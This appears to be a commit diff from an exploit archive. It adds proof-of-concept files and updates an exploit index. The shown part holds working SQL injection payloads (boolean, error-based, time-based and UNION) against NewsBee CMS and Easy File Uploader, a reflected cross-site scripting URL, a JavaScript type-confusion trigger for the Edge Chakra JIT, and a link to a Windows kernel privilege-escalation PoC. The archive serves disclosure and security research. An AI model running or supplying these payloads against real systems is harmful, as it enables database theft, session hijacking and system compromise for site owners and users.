(ELT(7126=7126,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hOBA'='hOBA&t=gallery
# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578' AND SLEEP(5) AND 'KlSV'='KlSV&t=gallery
# Type: UNION query
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=-1714' UNION ALL SELECT
NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
WSZd&t=gallery
# PoC: SQLi:
# Parameter: t
# Type: boolean-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578&t=gallery` WHERE 7854=7854 AND 1059=1059#
# Type: error-based
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578&t=gallery` WHERE 8962=8962 AND (SELECT 1892 FROM(SELECT
COUNT(*),CONCAT(0x7162787871,(SELECT
(ELT(1892=1892,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eLUC
# Type: AND/OR time-based blind
# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery
# Payload:
id=578&t=gallery` WHERE 5549=5549 AND SLEEP(5)-- RUaY

48
exploits/php/webapps/44703.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Easy File Uploader 1.7 - SQL Injection / Cross-Site
Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Version: 1.4 / fourth update
# Category: Webapps
# Tested on: Kali linux
# Description : Non-authorized users can perform the attack in the editing
area.
====================================================
# PoC : SQLi :
Parameter : id
Type : boolean-based blind
Demo :
http://test.com/EasyFileUploader/settings-users-edit.php?id=1
Payload : id=1' RLIKE (SELECT (CASE WHEN (7769=7769) THEN 27 ELSE 0x28
END))-- wKWi
Type : error-based
Payload : id=1' AND (SELECT 6379 FROM(SELECT
COUNT(*),CONCAT(0x717a627671,(SELECT
(ELT(6379=6379,1))),0x7178707071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ATeG
Type : AND/OR time-based blind
Demo :
http://test.com/EasyFileUploader/settings-users-edit.php?id=1
Payload : id=1' AND SLEEP(5)-- gTLZ
Type : UNION query
Demo :
http://test.com/EasyFileUploader/settings-users-edit.php?id=1
Payload : id=-3300' UNION ALL SELECT
NULL,NULL,CONCAT(0x717a627671,0x79556745594846426c69514d71737744775a6450464a5963786658766171476f447a79684675714a,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL#
====================================================
# PoC : XSS :
Payload :
http://test.com/EasyFileUploader/settings-users-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98
;

33
exploits/windows/dos/44694.js Normal file
View file

@ -0,0 +1,33 @@
/*
BOOL JavascriptNativeFloatArray::SetItem(uint32 index, double dValue)
{
if (*(uint64*)&dValue == *(uint64*)&JavascriptNativeFloatArray::MissingItem)
{
JavascriptArray *varArr = JavascriptNativeFloatArray::ToVarArray(this);
varArr->DirectSetItemAt(index, JavascriptNumber::ToVarNoCheck(dValue, GetScriptContext()));
return TRUE;
}
this->DirectSetItemAt<double>(index, dValue);
return TRUE;
}
As you can see above, if the double value given as the parameter equals to JavascriptNativeFloatArray::MissingItem, it converts the float array to a var array. Since the input value is not checked in the JITed code, it can lead to type confusion.
*/
function opt(arr, value) {
arr[1] = value;
arr[0] = 2.3023e-320;
}
function main() {
for (let i = 0; i < 0x10000; i++)
opt([1.1], 2.2);
let arr = [1.1];
opt(arr, -5.3049894784e-314); // MAGIC VALUE!
print(arr);
}
main();

7
exploits/windows/local/44697.txt Normal file
View file

@ -0,0 +1,7 @@
Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.
- KVA Shadowing should be disabled and the relevant security update should be uninstalled.
- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip

36
files_exploits.csv
View file

@ -5974,6 +5974,9 @@ id,file,description,date,author,type,platform,port
44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux,
44653,exploits/windows/dos/44653.js,"Microsoft Edge Chakra JIT - Bound Check Elimination Bug",2018-05-18,"Google Security Research",dos,windows,
44693,exploits/linux/dos/44693.py,"Siemens SIMATIC S7-1500 CPU - Remote Denial of Service",2018-05-22,t4rkd3vilz,dos,linux,
44694,exploits/windows/dos/44694.js,"Microsoft Edge Chakra JIT - Magic Value Type Confusion",2018-05-22,"Google Security Research",dos,windows,
44695,exploits/hardware/dos/44695.c,"AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass",2018-05-22,"Google Security Research",dos,hardware,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9724,6 +9727,10 @@ id,file,description,date,author,type,platform,port
44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows,
44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux,
44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86,
44688,exploits/linux/local/44688.txt,"Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read",2018-05-22,"Paul Taylor",local,linux,
44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android,
44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux,
44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39330,7 +39337,8 @@ id,file,description,date,author,type,platform,port
44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php,
44625,exploits/php/webapps/44625.txt,"VirtueMart 3.1.14 - Persistent Cross-Site Scripting",2018-05-16,"Mattia Furlani",webapps,php,
44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows,
44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting",2018-05-16,L0RD,webapps,php,
44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting",2018-05-16,L0RD,webapps,php,
44685,exploits/php/webapps/44685.txt,"Zechat 1.5 - SQL Injection / Cross-Site Request Forgery",2018-05-22,L0RD,webapps,php,
44628,exploits/linux/webapps/44628.txt,"Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery",2018-05-16,L0RD,webapps,linux,
44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp,
44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80
@ -39339,7 +39347,7 @@ id,file,description,date,author,type,platform,port
44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware,
44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,
44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux,
44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
44646,exploits/php/webapps/44646.txt,"Monstra CMS before 3.0.4 - Cross-Site Scripting",2018-05-18,"Berk Dusunur",webapps,php,
44647,exploits/linux/webapps/44647.txt,"SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure",2018-05-18,"Richard Alviarez",webapps,linux,
44651,exploits/php/webapps/44651.txt,"Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
@ -39348,18 +39356,30 @@ id,file,description,date,author,type,platform,port
44657,exploits/hardware/webapps/44657.txt,"D-Link DSL-3782 - Authentication Bypass",2018-05-20,"Giulio Comi",webapps,hardware,
44661,exploits/php/webapps/44661.txt,"Superfood 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
44660,exploits/php/webapps/44660.txt,"Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection",2018-05-20,"Sina Kheirkhah",webapps,php,
44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php,
44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php,
44664,exploits/php/webapps/44664.txt,"Zenar Content Management System - Cross-Site Scripting",2018-05-21,"Berk Dusunur",webapps,php,
44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,
44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java,
44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java,
44667,exploits/linux/webapps/44667.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,linux,
44671,exploits/hardware/webapps/44671.html,"Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44672,exploits/hardware/webapps/44672.txt,"Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44675,exploits/hardware/webapps/44675.html,"Teradek Cube 7.3.6 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44676,exploits/hardware/webapps/44676.html,"Teradek Slice 7.3.15 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
44678,exploits/windows/webapps/44678.txt,"Schneider Electric PLCs - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,windows,
44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass",2018-05-21,L0RD,webapps,php,
44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,
44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass",2018-05-21,L0RD,webapps,php,
44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
44684,exploits/hardware/webapps/44684.txt,"Nordex N149/4.0-4.5 - SQL Injection",2018-05-22,t4rkd3vilz,webapps,hardware,
44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,
44687,exploits/linux/webapps/44687.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting",2018-05-22,t4rkd3vilz,webapps,linux,
44689,exploits/php/webapps/44689.txt,"PaulPrinting CMS Printing 1.0 - SQL Injection",2018-05-22,"Mehmet Onder",webapps,php,
44692,exploits/php/webapps/44692.txt,"iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-22,L0RD,webapps,php,
44691,exploits/java/webapps/44691.txt,"ERPnext 11 - Cross-Site Scripting",2018-05-22,"Veerababu Penugonda",webapps,java,
44698,exploits/linux/webapps/44698.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,linux,
44699,exploits/php/webapps/44699.txt,"Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting",2018-05-22,L0RD,webapps,php,
44700,exploits/php/webapps/44700.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,php,
44701,exploits/php/webapps/44701.txt,"Feedy RSS News Ticker 2.0 - 'cat' SQL Injection",2018-05-22,AkkuS,webapps,php,
44702,exploits/php/webapps/44702.txt,"NewsBee CMS 1.4 - 'download.php' SQL Injection",2018-05-22,AkkuS,webapps,php,
44703,exploits/php/webapps/44703.txt,"Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting",2018-05-22,AkkuS,webapps,php,

Can't render this file because it is too large.